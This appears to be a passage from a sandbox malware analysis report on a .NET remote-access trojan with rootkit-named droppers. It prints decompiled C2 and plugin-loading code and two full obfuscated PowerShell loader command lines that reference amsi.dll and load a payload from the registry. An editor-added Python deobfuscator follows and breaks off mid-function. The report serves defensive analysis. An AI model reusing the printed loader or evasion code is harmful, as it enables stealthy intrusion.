                          Source: C:\Users\Public\Deadsvchost.exeSection loaded: uxtheme.dll
                          Source: C:\Users\Public\Deadsvchost.exeSection loaded: sspicli.dll
                          Source: C:\Users\Public\Deadsvchost.exeSection loaded: cryptsp.dll
                          Source: C:\Users\Public\Deadsvchost.exeSection loaded: rsaenh.dll
                          Source: C:\Users\Public\Deadsvchost.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                          Source: C:\Windows\System32\dwm.exeSection loaded: pdh.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                          Source: C:\Users\Public\Deadsvchost.exeSection loaded: mscoree.dll
                          Source: C:\Users\Public\Deadsvchost.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\Public\Deadsvchost.exeSection loaded: version.dll
                          Source: C:\Users\Public\Deadsvchost.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Users\Public\Deadsvchost.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\Public\Deadsvchost.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\Public\Deadsvchost.exeSection loaded: uxtheme.dll
                          Source: C:\Users\Public\Deadsvchost.exeSection loaded: sspicli.dll
                          Source: C:\Users\Public\Deadsvchost.exeSection loaded: cryptsp.dll
                          Source: C:\Users\Public\Deadsvchost.exeSection loaded: rsaenh.dll
                          Source: C:\Users\Public\Deadsvchost.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                          Source: C:\Users\Public\Deadsvchost.exeSection loaded: mscoree.dll
                          Source: C:\Users\Public\Deadsvchost.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\Public\Deadsvchost.exeSection loaded: version.dll
                          Source: C:\Users\Public\Deadsvchost.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Users\Public\Deadsvchost.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\Public\Deadsvchost.exeSection loaded: uxtheme.dll
                          Source: C:\Users\Public\Deadsvchost.exeSection loaded: sspicli.dll
                          Source: C:\Users\Public\Deadsvchost.exeSection loaded: cryptsp.dll
                          Source: C:\Users\Public\Deadsvchost.exeSection loaded: rsaenh.dll
                          Source: C:\Users\Public\Deadsvchost.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                          Source: C:\Windows\System32\spoolsv.exeSection loaded: pdh.dll
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                          Source: Deadsvchost.lnk.1.drLNK file: ..\..\..\..\..\..\..\..\Public\Deadsvchost.exe
                          Source: DeadROOTkit.lnk.2.drLNK file: ..\..\..\..\..\..\Local\DeadROOTkit.exe
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                          Source: mIURiU8n2P.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                          Source: mIURiU8n2P.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000017.00000000.1840584622.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2942503144.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wctAB5F.tmp.pdb source: svchost.exe, 00000017.00000000.1840558344.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2941691166.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000017.00000002.2940183395.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.1840509505.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000017.00000000.1840558344.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2941691166.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000017.00000000.1840558344.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2941691166.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000017.00000002.2940183395.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2.pdbr source: svchost.exe, 00000017.00000000.1840558344.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2941691166.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000017.00000000.1840584622.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2942503144.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: WINLOA~1.PDB source: svchost.exe, 00000017.00000000.1840558344.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2941691166.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000017.00000000.1840584622.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2942503144.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000017.00000002.2940183395.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.1840509505.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000017.00000000.1840558344.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2941691166.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct3D66.tmp.pdb source: svchost.exe, 00000017.00000000.1840584622.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2942503144.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000017.00000002.2940183395.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.1840509505.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 00000017.00000000.1840584622.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2942503144.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000017.00000000.1840584622.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2942503144.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wmsetup.log.pdb source: svchost.exe, 00000017.00000000.1840558344.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2941691166.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000017.00000002.2940183395.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.1840509505.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000017.00000000.1840584622.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2942503144.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp

                          Data Obfuscation

                          Source: DeadXClient.exe.0.dr, Messages.cs  .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                          Source: DeadXClient.exe.0.dr, Messages.cs  .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                          Source: DeadROOTkit.exe.0.dr, Messages.cs  .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                          Source: DeadROOTkit.exe.0.dr, Messages.cs  .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Helper.SB(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                          Source: DeadROOTkit.exe.0.dr, Messages.cs  .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                          Source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, Messages.cs  .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                          Source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, Messages.cs  .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Helper.SB(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                          Source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, Messages.cs  .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                          Source: Deadsvchost.exe.1.dr, Messages.cs  .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                          Source: Deadsvchost.exe.1.dr, Messages.cs  .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                          Source: DeadROOTkit.exe.2.dr, Messages.cs  .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                          Source: DeadROOTkit.exe.2.dr, Messages.cs  .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Helper.SB(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                          Source: DeadROOTkit.exe.2.dr, Messages.cs  .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                          Source: DeadXClient.exe.0.dr, Messages.cs  .Net Code: Plugin System.AppDomain.Load(byte[])
                          Source: DeadXClient.exe.0.dr, Messages.cs  .Net Code: Memory System.AppDomain.Load(byte[])
                          Source: DeadXClient.exe.0.dr, Messages.cs  .Net Code: Memory
                          Source: DeadROOTkit.exe.0.dr, Messages.cs  .Net Code: Plugin System.AppDomain.Load(byte[])
                          Source: DeadROOTkit.exe.0.dr, Messages.cs  .Net Code: Memory System.AppDomain.Load(byte[])
                          Source: DeadROOTkit.exe.0.dr, Messages.cs  .Net Code: Memory
                          Source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, Messages.cs  .Net Code: Plugin System.AppDomain.Load(byte[])
                          Source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, Messages.cs  .Net Code: Memory System.AppDomain.Load(byte[])
                          Source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, Messages.cs  .Net Code: Memory
                          Source: Deadsvchost.exe.1.dr, Messages.cs  .Net Code: Plugin System.AppDomain.Load(byte[])
                          Source: Deadsvchost.exe.1.dr, Messages.cs  .Net Code: Memory System.AppDomain.Load(byte[])
                          Source: Deadsvchost.exe.1.dr, Messages.cs  .Net Code: Memory
                          Source: DeadROOTkit.exe.2.dr, Messages.cs  .Net Code: Plugin System.AppDomain.Load(byte[])
                          Source: DeadROOTkit.exe.2.dr, Messages.cs  .Net Code: Memory System.AppDomain.Load(byte[])
                          Source: DeadROOTkit.exe.2.dr, Messages.cs  .Net Code: Memory
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Anti Malware Scan Interface: GetDelegateForFunctionPointer($LadMSRasXMAaNc,$SsrFUvzfWALaJuFfDwp).Invoke(''+'a'+''+[Char](109)+''+'s'+'i.'+[Char](100)+''+'ll');$BNdTdCEoXMsXuDwEG=$zjaDRBJuPBhArz.Invoke($Null,@([Object]$HSvqCok,[Objec
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Anti Malware Scan Interface: DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+'e'+[Char]
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Anti Malware Scan Interface: Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+'T'+[Char](87)+'A'+[Char](82)+'E').GetValue(''+[Char](68)+'e'+'a'+''+'d'+''+[Char](115)+''+'t'+'a'+[Cha
                          Source: unknown  Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:bubCglTffNzZ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$QBDRAqnALMmwja,[Parameter(Position=1)][Type]$duQqlSyxSK)$pNdjVVbnfJT=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+[Char](77)+''+'e'+''+[Char](109)+''+'o'+''+'r'+'y'+[Char](77)+'o'+[Char](100)+''+[Char](117)+'l'+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+'De'+'l'+'e'+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+''+'T'+''+'y'+''+'p'+''+'e'+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'u'+'b'+'l'+[Char](105)+''+[Char](99)+','+'S'+''+'e'+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d,A'+[Char](110)+''+[Char](115)+'i'+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+'Au'+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$pNdjVVbnfJT.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+'m'+[Char](101)+''+','+''+'H'+''+[Char](105)+''+'d'+''+'e'+''+[Char](66)+'y'+[Char](83)+'i'+'g'+''+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$QBDRAqnALMmwja).SetImplementationFlags('R'+[Char](117)+''+'n'+'t'+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$pNdjVVbnfJT.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+'e'+'',''+'P'+''+[Char](117)+'bl'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+'e'+'B'+''+[Char](121)+''+'S'+''+'i'+''+'g'+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+'t'+','+[Char](86)+''+[Char](105)+'r'+[Char](116)+'u'+'a'+''+'l'+'',$duQqlSyxSK,$QBDRAqnALMmwja).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e'+[Char](44)+''+'M'+'a'+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $pNdjVVbnfJT.CreateType();}$RJkdRlkUxkpOh=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sy'+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+'r'+[Char](111)+''+'s'+''+[Char](111)+''+'f'+'t.W'+[Char](105)+'n'+[Char](51)+'2.'+[Char](85)+''+[Char](110)+'s'+[Char](97)+'f
                          Source: unknown  Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:bubCglTffNzZ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$QBDRAqnALMmwja,[Parameter(Position=1)][Type]$duQqlSyxSK)$pNdjVVbnfJT=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+[Char](77)+''+'e'+''+[Char](109)+''+'o'+''+'r'+'y'+[Char](77)+'o'+[Char](100)+''+[Char](117)+'l'+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+'De'+'l'+'e'+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+''+'T'+''+'y'+''+'p'+''+'e'+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'u'+'b'+'l'+[Char](105)+''+[Char](99)+','+'S'+''+'e'+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d,A'+[Char](110)+''+[Char](115)+'i'+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+'Au'+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$pNdjVVbnfJT.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+'m'+[Char](101)+''+','+''+'H'+''+[Char](105)+''+'d'+''+'e'+''+[Char](66)+'y'+[Char](83)+'i'+'g'+''+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$QBDRAqnALMmwja).SetImplementationFlags('R'+[Char](117)+''+'n'+'t'+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$pNdjVVbnfJT.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+'e'+'',''+'P'+''+[Char](117)+'bl'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+'e'+'B'+''+[Char](121)+''+'S'+''+'i'+''+'g'+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+'t'+','+[Char](86)+''+[Char](105)+'r'+[Char](116)+'u'+'a'+''+'l'+'',$duQqlSyxSK,$QBDRAqnALMmwja).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e'+[Char](44)+''+'M'+'a'+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $pNdjVVbnfJT.CreateType();}$RJkdRlkUxkpOh=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sy'+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+'r'+[Char](111)+''+'s'+''+[Char](111)+''+'f'+'t.W'+[Char](105)+'n'+[Char](51)+'2.'+[Char](85)+''+[Char](110)+'s'+[Char](97)+'f
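Every string in the two powershell.exe command lines above is built at run time from single-quoted fragments and [Char](N) casts (for example ''+'a'+''+[Char](109)+''+'s'+'i.'+[Char](100)+''+'ll' is 'amsi.dll'), which defeats naive keyword matching on the command line. The deobfuscator below is an example added by the editor; it is not part of the Joe Sandbox report or of the sample. SAMPLE is a constructed excerpt stitched together from the report's own command lines and AMSI captures and shortened so the script runs offline; the function names are the editor's.

```python
"""Collapse PowerShell string-building chains ('a'+[Char](109)+'s'+...)
back into plain literals so the obfuscated loader can be read.
Editor's example; not code from the report or the sample."""
import re

# One term of a concatenation chain: a single-quoted PowerShell literal
# ('' is the escaped quote inside such a literal) or a [Char](N) cast.
_TERM = r"'(?:[^']|'')*'|\[Char\]\(\d+\)"
# A chain is one or more terms joined by '+', optionally with whitespace.
_CHAIN = re.compile(rf"(?:{_TERM})(?:\s*\+\s*(?:{_TERM}))*", re.IGNORECASE)
_LITERAL = re.compile(r"'((?:[^']|'')*)'")
_CHARCAST = re.compile(r"\[Char\]\((\d+)\)", re.IGNORECASE)


def _eval_term(term: str) -> str:
    """Evaluate one literal or [Char](N) term to the text it denotes."""
    m = _CHARCAST.fullmatch(term)
    if m:
        return chr(int(m.group(1)))
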